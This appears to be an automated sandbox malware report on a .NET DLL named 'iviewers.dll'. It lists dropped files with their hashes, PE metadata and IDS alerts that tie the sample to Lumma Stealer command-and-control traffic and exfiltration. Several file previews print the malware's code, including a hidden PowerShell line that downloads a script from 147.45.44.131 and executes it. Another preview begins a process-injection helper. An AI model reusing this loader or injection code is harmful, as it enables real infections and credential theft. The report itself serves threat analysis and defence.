                                                          Preview:.using System;.using System.Diagnostics;..namespace iviewers.{. class BitmapColorPixel. {. public static void StartBitmap(). {. ProcessStartInfo startInfo = new ProcessStartInfo. {. FileName = "powershell",. Arguments = @"-Command ""iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex""",. WindowStyle = ProcessWindowStyle.Hidden. };.. using (Process p = Process.Start(startInfo)). {. p.WaitForExit();. }.. Environment.Exit(0);. }. }.}.
                                                          Process:C:\Windows\SysWOW64\regsvr32.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):185
                                                          Entropy (8bit):4.991813240264389
                                                          Encrypted:false
                                                          SSDEEP:3:0HXEXA8F+H2R5BJ1RCHyg4E2J5xAIaSP+1POaiQCIFRVRMxTPICHyg4E2J5xAIaq:pAu+H2LnCHhJ23fZ21zzxszICHhJ23fb
                                                          MD5:725F54B6D37F18EEE8BCB817D98F1029
                                                          SHA1:4C7CB48745FA1E34AF110D501A5789D6D5077AD8
                                                          SHA-256:CEE309D5C2257A58539BF6B5E27645DAE9D479F80CA0613F031DD1C6C43F010B
                                                          SHA-512:1AD532548D25053B3D4F7743B13DDE064FA4C9DA7D176D1B23DFAF501C85057240520CB610259CAC6952299EA70A26CB5FDEC196664BE19DE42E79A77E1AA206
                                                          Malicious:true
                                                          Preview:./t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.0.cs"
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4096
                                                          Entropy (8bit):2.951867598621192
                                                          Encrypted:false
                                                          SSDEEP:48:6/1gJHpAUb0JaElbo7jhIB/4DMPvfGv1ul9a3Bq:dAUJ790rP33fK
                                                          MD5:69322C2D496D7AEE3BA8057F243349FC
                                                          SHA1:852307AE56C8E633227296166EA1864C39EADE07
                                                          SHA-256:622EB048EC3585CFB2D1815657AB29EE486746F212A0EB424C215520B9EC10E1
                                                          SHA-512:D83693FADEBE54B96B2BCC71F4D01D5FF871A89F8119347AFFFBF041E25ABAB1D8C520BEAADD8B73E5D9447E5CB2976487636837BB234D910551616231867B05
                                                          Malicious:true
                                                          Process:C:\Windows\SysWOW64\regsvr32.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):684
                                                          Entropy (8bit):5.222989122069287
                                                          Encrypted:false
                                                          SSDEEP:12:K8/qR37L5xEzZxE84KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOqdBiSKax5DqBVKVrdFAMBJTH
                                                          MD5:9F5B515CB33901FA3282925D42D4691F
                                                          SHA1:5F5F41F722560614A677BE9A68AC8AEC2F627683
                                                          SHA-256:54D15D9B19CEE62B7E50A4C6EB903C56C1E4E5C324B4A5C4147AFF505132B6F7
                                                          SHA-512:80EF54052F8EDEBC372F4D794FC7F9ACB1935D3A892984F486F321994637968C0A43EE12F5F8B34EE119368F23AD7126B8B96F18B61B3339C6B2503A69C3403E
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.0979689713878416
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryEak7YnqqaPN5Dlq5J:+RI+ycuZhNiakSaPNnqX
                                                          MD5:CD3F0B413ADD89FA0C41EB5FC0DF0BBF
                                                          SHA1:0CB75CC62C402C44BDB4B6252E20EC7A93F87035
                                                          SHA-256:2851FE538DB9E322F5129958F7FFE7C69FF77B57A4296AA19809983037AE68D8
                                                          SHA-512:9400A6B2CD0798050C30F35C58D11977DA92D24520CA694D059E18396765F0898C9D0F0A43D03360FAD92336F1A3F3B4F5A7F80738BDB3F614D337FF7BE6D5B6
                                                          Malicious:false
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):10583
                                                          Entropy (8bit):4.487855797297623
                                                          Encrypted:false
                                                          SSDEEP:192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
                                                          MD5:B022C6FE4494666C8337A975D175C726
                                                          SHA1:8197D4A993E7547D19D7B067B4D28EBE48329793
                                                          SHA-256:D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
                                                          SHA-512:DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
                                                          Malicious:false
                                                          Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):206
                                                          Entropy (8bit):4.966801679704727
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2L/6K2CHhJ23fnnHUzxszICHhJ23fnx:p37L/6KiP0ZPx
                                                          MD5:80208B74B8FA1CD7D178FABEFC659D25
                                                          SHA1:31BAB2750B473099D6A713C5F2A28FE86A58E67B
                                                          SHA-256:9C15BA0B985E39462177009DB93161A6D693AC46E1FE88CF0E7078965FAD2ABD
                                                          SHA-512:6D7F49B4F46572A8E516189E4C0DFCBE85AB62CE2F5F3CCCED48935EAF7714460F736071DFA222383D792DE8F11B62464F0DAEADDBA39AF6ACB05D90C4D11D91
                                                          Malicious:false
                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.0.cs"
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):8704
                                                          Entropy (8bit):4.661696653808497
                                                          Encrypted:false
                                                          SSDEEP:96:zbuaQZGQf9xPQ2pCa/u67hHJ89IhbpPrjzKcaEZRAH0ljILHqrv5MqLTzeNc+i0K:zCaQHf9WDa/u6NRj2cavUxd5MqDeNcp
                                                          MD5:591D576666D4959490A788E7A55C7EA4
                                                          SHA1:9F04784B5C11D896F4D34D5886029F06395DA69C
                                                          SHA-256:8D0522B6D078BD89FF1750DF8822820BD002CBF0BD85C9D8BCFD1B23DA314EC4
                                                          SHA-512:E69B8B41A89B49BB04482DD3320D9845D0460AF9C3C22FE390D9FAD48AB08D1AFE7B3184C6D7C10B45853613642987579EC3A6A8725E5E1489299FCA2B0A141D
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jg...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):705
                                                          Entropy (8bit):5.229375258388161
                                                          Encrypted:false
                                                          SSDEEP:12:K8/qR37L/6KiP0ZPUKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOqdn6Ki0sKax5DqBVKVrdFAMBJTH
                                                          MD5:68221AC289C8079A4A40A50B28EB1689
                                                          SHA1:16BBE74C819E585424C7E5BDAFC2D61352428532
                                                          SHA-256:856758E68BF40D1FFA1BAABD69D61B2FEF1B79CAD55431EC874E7DED0ACF9FDF
                                                          SHA-512:34D35231B613D02395EFC1F83D6DA1435BC8588D1F4BC08699E0A864AD3951E81D8E94218F20BB17DFA3FBE57C8D6D43D9EE988168F3DE6E7B234CD249BED86F
                                                          Malicious:false
Preview:
C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.0.cs"

Microsoft (R) Visual C# Compiler version 4.8.4084.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.

This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.1045785044066894
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryPak7Ynqq7PN5Dlq5J:+RI+ycuZhNtakS7PNnqX
                                                          MD5:5A4CE53FAF3AF0FA06F6B8B1A84F9627
                                                          SHA1:046415A7586164F3A7918DF612FA253ECFC2473A
                                                          SHA-256:3ACF8CAF45CE3749D99AA7DBCF936C018C41DC3BF6E9CF6A361766F48A29DB30
                                                          SHA-512:7715A3907F740A9A0D08F0FCD5CC31A5472B6C822C6EB6A21229C15CAE7ECA6D94381644DCA0C0BEA998E35D11B0E3121AE95EF966F14CE20FA879AA706DC268
                                                          Malicious:false
                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.h.y.t.d.s.x.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...z.h.y.t.d.s.x.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):724
                                                          Entropy (8bit):4.782753816020807
                                                          Encrypted:false
                                                          SSDEEP:12:V/DTLDauCiQnFOd6FTtf8FkxmaTqTy2dn7+o0zNLmiRSLFUQCL:JjbCiKFc6FowJ2xaoiN3RGUNL
                                                          MD5:99382B41100168F76538CFBD7C420DE5
                                                          SHA1:8C4097E9A57C6CD198C39DC42EF913F14263D211
                                                          SHA-256:096719AB4C6A1F5BAE559122034A423DBCEAF015653FD567263704015D2A2099
                                                          SHA-512:225CEE697ACB1972EBCB1C4E131EA254E6C6D60BE0DA0476D99FA4275C92FBEB27556B74540AD15B007E23B09F621805F4C759D9701BAAD386C9A179C58332FD
                                                          Malicious:false
Preview:
using System;
using System.Diagnostics;

namespace iviewers
{
    class BitmapColorPixel
    {
        public static void StartBitmap()
        {
            ProcessStartInfo startInfo = new ProcessStartInfo
            {
                FileName = "powershell",
                Arguments = @"-Command ""iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex""",
                WindowStyle = ProcessWindowStyle.Hidden
            };

            using (Process p = Process.Start(startInfo))
            {
                p.WaitForExit();
            }

            Environment.Exit(0);
        }
    }
}
                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):185
                                                          Entropy (8bit):4.972410822675697
                                                          Encrypted:false
                                                          SSDEEP:3:0HXEXA8F+H2R5BJ1RCHyg4E2J5xAIqvB+v1HlaiQCIFRVRMxTPICHyg4E2J5xAIT:pAu+H2LnCHhJ23fq9zxszICHhJ23fqY
                                                          MD5:2ADF650FB05321CCB599F112ADD297C5
                                                          SHA1:A7041861EF07BF86981B0C8A384203A387072B9A
                                                          SHA-256:E207E54D342981D02AC6E2856B627B3203898DBC64B8D3DB4206688BE2126FF3
                                                          SHA-512:51D65C75FD23B1ED9F1CD83A871A23001DC14E871E4A68EE368FBF2FBA63C85E7CC59FC3C9A567D3F8624F4083E68034A5E5AD0412F120E9F46F26AEAD5E7312
                                                          Malicious:false
                                                          Preview:./t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.0.cs"
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4096
                                                          Entropy (8bit):2.952700462723094
                                                          Encrypted:false
                                                          SSDEEP:48:6W1gJHpAU50JLplbo7jhIB/4DMPvfSv1ulta3xq:qAUF790rP3D/K
                                                          MD5:A0CD0E695F9655617DBC02E70F44B40F
                                                          SHA1:641052917769E7BDA03117F65F1849A183998909
                                                          SHA-256:2BC87C4880CE5E4428B73C8D4D3F95B87A261B953E060908EB0E6702130B54DB
                                                          SHA-512:9DAEAE00BCBDD75F5EBFCD89B1884556E9A9223C2882E1CFF9CD83D15EC6177C45339CBFBEAC9CCD17FCDEEFD33D156E612B5BAE22AE8E6A11E6D9D59C315978
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ...............................................................0..E.......s......r...po.....r...po......o.......(......o.......,..o......(....*.........,..4........(....*BSJB............v4.0.30319......l...@...#~......d...#Strings............#US.........#GUID.......`...#Blob...........G.........%3....................................................A.:...z.Z.....Z...............#.....=.:...Q.:.....................(.......P ......H...... ......T.......T.....T...!.T...
                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):684
                                                          Entropy (8bit):5.236158023523256
                                                          Encrypted:false
                                                          SSDEEP:12:K8/qR37L5S9ZSNKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOqdBS7SNKax5DqBVKVrdFAMBJTH
                                                          MD5:A3B717B1C57F6E09A56807F6188E1F64
                                                          SHA1:0813E7EF634C36A189D9EE19084B217B9F83C85D
                                                          SHA-256:A4DA6B875740FA34EFD1FE49182EB06CC460879E3F9EE72AC36A3C8047CD8705
                                                          SHA-512:E768A33A11D363C1CB61B58356503DCD9CCF9147DE4FAB9D4318E172C24B68BC59123645297FDDDA67AA6166193C9DA0AE17BFEFC2E54CF362F8FBDBA0618845
                                                          Malicious:false
Preview:
C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.0.cs"

Microsoft (R) Visual C# Compiler version 4.8.4084.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.

This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240
                                                          File type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):4.127229801084978
                                                          TrID:
                                                          • Win32 Dynamic Link Library (generic) Net Framework (1011504/3) 44.80%
                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 44.38%
                                                          • Generic .NET DLL/Assembly (238134/4) 10.55%
                                                          • Win16/32 Executable Delphi generic (2074/23) 0.09%
                                                          • Generic Win/DOS Executable (2004/3) 0.09%
                                                          File name:iviewers.dll
                                                          File size:9'216 bytes
                                                          MD5:021b791221db8fd3d93875f0a38ba5ef
                                                          SHA1:505389236008ff05d84ef543566355aca2b3eb61
                                                          SHA256:480d586ae595a2f7a47c20aee500758b03a596837b073ede049920d50fb24a05
                                                          SHA512:77ee3b8c15aca98992d2e58737c3015bfc9e30141b04dbaa8c750cf839f2ac4a5e645c04e8de030b08210bd8b16aea4e71b6bc43f0e36256b566740997639371
                                                          SSDEEP:192:wXIy/D9DaozFCNY7+VS9aK08SWc4oVhfJY3XuR7g/vXWtV:wvtaoBCNdSl08S9dfIXq7kXWtV
                                                          TLSH:D712962677E8013FF5B34FB26F9161912D79F7F99B17952E48A403498BC2A00CEA1735
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....hg...........!.................7... ...@....... ....................................@..........................@..(..
                                                          Icon Hash:7ae282899bbab082
                                                          Entrypoint:0x1000371e
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x10000000
                                                          Subsystem:windows cui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x67682E9F [Sun Dec 22 15:22:07 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:dae02f32a21e03ce65412f6e56942daa
                                                          Instruction
                                                          jmp dword ptr [10002000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x4004 | 0x28 | .sdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x36cc | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6000 | 0x3d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x1724 | 0x1800 | 69cf51443db6d6a24459dae5b0375da6 | False | 0.4713541666666667 | data | 4.965129802097543 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata | 0x4000 | 0x56 | 0x200 | 67a7280dca266d2af5d3760c79ec2f21 | False | 0.154296875 | data | 0.9104602226152042 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x6000 | 0x3d8 | 0x400 | 2f32111f189e61eb9fa7b824f9d87d8a | False | 0.3916015625 | data | 3.160547167726883 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x8000 | 0xc | 0x200 | b33ede57f2ddffc55b3cdc7d80887250 | False | 0.048828125 | data | 0.12227588125913882 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x6058 | 0x380 | data | | | 0.41517857142857145
DLL | Import
mscoree.dll | _CorDllMain
Name | Ordinal | Address
DllRegisterServer | 1 | 0x100036be
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-24T02:18:15.825605+0100 | 2859377 | ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET) | 1 | 192.168.2.8 | 49706 | 147.45.44.131 | 80 | TCP
2024-12-24T02:18:15.882650+0100 | 2859377 | ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET) | 1 | 192.168.2.8 | 49707 | 147.45.44.131 | 80 | TCP
2024-12-24T02:18:16.547808+0100 | 2859377 | ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET) | 1 | 192.168.2.8 | 49706 | 147.45.44.131 | 80 | TCP
2024-12-24T02:18:16.621990+0100 | 2859377 | ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET) | 1 | 192.168.2.8 | 49707 | 147.45.44.131 | 80 | TCP
2024-12-24T02:18:17.508551+0100 | 2859377 | ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET) | 1 | 192.168.2.8 | 49708 | 147.45.44.131 | 80 | TCP
2024-12-24T02:18:18.493265+0100 | 2859377 | ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET) | 1 | 192.168.2.8 | 49708 | 147.45.44.131 | 80 | TCP
2024-12-24T02:18:20.445540+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49709 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:20.446008+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49710 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:21.489323+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49712 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:21.702761+0100 | 2859377 | ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET) | 1 | 192.168.2.8 | 49711 | 147.45.44.131 | 80 | TCP
2024-12-24T02:18:21.915329+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49709 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:21.915329+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49709 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:21.936896+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49710 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:21.936896+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49710 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:22.256469+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49712 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:22.256469+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49712 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:22.428578+0100 | 2859377 | ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET) | 1 | 192.168.2.8 | 49711 | 147.45.44.131 | 80 | TCP
2024-12-24T02:18:22.831849+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49714 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:23.131739+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49715 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:23.478840+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49716 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:24.238070+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.8 | 49716 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:24.238070+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49716 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:25.786583+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49717 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:26.049767+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49718 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:26.799396+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49718 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:26.799396+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49718 | 172.67.195.241 | 443 | TCP
2024-12-24T02:18:26.991906+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.8 | 49717 | 172.67.195.241 | 443 | TCP
                                                          2024-12-24T02:18:28.029002+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849719172.67.195.241443TCP
                                                          2024-12-24T02:18:28.253360+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849720172.67.195.241443TCP
                                                          2024-12-24T02:18:28.794733+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849719172.67.195.241443TCP
                                                          2024-12-24T02:18:28.794733+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849719172.67.195.241443TCP
                                                          2024-12-24T02:18:30.647319+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849721172.67.195.241443TCP
                                                          2024-12-24T02:18:33.014934+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849723172.67.195.241443TCP
                                                          2024-12-24T02:18:33.016177+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849722172.67.195.241443TCP
                                                          2024-12-24T02:18:35.342680+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849724172.67.195.241443TCP
                                                          2024-12-24T02:18:35.354173+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849725172.67.195.241443TCP
                                                          2024-12-24T02:18:37.455265+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849726172.67.195.241443TCP
                                                          2024-12-24T02:18:38.944428+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849727172.67.195.241443TCP
